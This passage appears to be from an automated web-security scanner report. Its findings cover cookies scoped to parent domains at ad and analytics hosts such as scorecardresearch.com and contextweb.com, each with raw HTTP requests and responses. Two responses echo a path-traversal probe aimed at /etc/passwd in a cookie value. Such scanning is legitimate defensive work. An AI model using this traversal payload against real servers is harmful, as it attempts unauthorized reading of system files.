Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sZLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qEBt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GPFg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HG8X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AMrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L9DA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1djr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_R2Sk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tqia=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_W0Nw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wjT0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OVF5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xj6q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tn_F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Xy4W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7q1i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3mus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9AUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nDzG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_41iQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_70NL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lLND=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_WJEP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ew4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Av4C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KbQB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VU1j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tsTn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RqxL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_CYmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3BOa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dhOx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gXRf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_w1GX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_91sR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Xxa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xUzf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RS6A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rX_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ynys=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xND8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_U2-d=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_S-vO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HG7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_id7F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2D0P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_M1Z_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2RcV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fldA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_i0tL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4m8k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ppkq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G93Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JCjG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yHyN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C5Uh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8olB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kFhz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JeGp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Re8S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pDeg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wxyS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VyjV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JsaM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1p6o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VIa5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zc6p=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ptuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AlmC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__Yzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_k7NG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dpiY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OLBq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D3J-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tpuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MnS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bpmx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gx4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OGcW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4g95=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gjH6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GCsG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l41s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nSTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zd-e=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Dpzn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AnWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jcjr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wDL0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GNkZ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Mzt2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A76z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pLOm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4cFc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kaha=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ar9b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Iei_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h03W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QYQn="MLtXrt8vtl9rIAF9m8HM9CRwtSv8pwYgsssFOu5OTeOlKAZz5+/wuXtI5aPioHhhdEjAIagkY/G8GHOoPBTZKbe4LvfbnbdkKhONXmKkgHQgdLckCXP0Ycf6bL86yMYbL1uMiqL/s6MNej7gFcLrWQkAx8c6IYdi+yDQifN3Qycz6Jj1em6Y5Eay9ZRgmRVQd4wL1CPn/dRQ4JoZ5iAZWwFtgtxpYZ2eGJoLULxN8vLRSvbSAvOi3Mra/1wX6oTWmDs4ThHYmdgsHYPtkd1lfMJC8ZS8jNp4O4oZuhx+vDf6G8BYd19mNkCBOkzH6Y5GDSLMLc63IB0="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:57:01 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.10. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035630&c3=&c4=&c5=&c6=&c15=&ns__t=1315097328739&ns_c=UTF-8&c8=Notre%20Dame%2C%20Michigan%20stadiums%20cleared%20due%20to%20storms%20%7C%20Reuters&c7=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&c9=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:48:11 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.11. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:52:26 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:52:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.12. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=189535721&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:06:36 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:06:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.13. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=2925993182975414771 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app603
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 00:56:36 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 00:56:36 GMT; Path=/
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:56:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.14. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

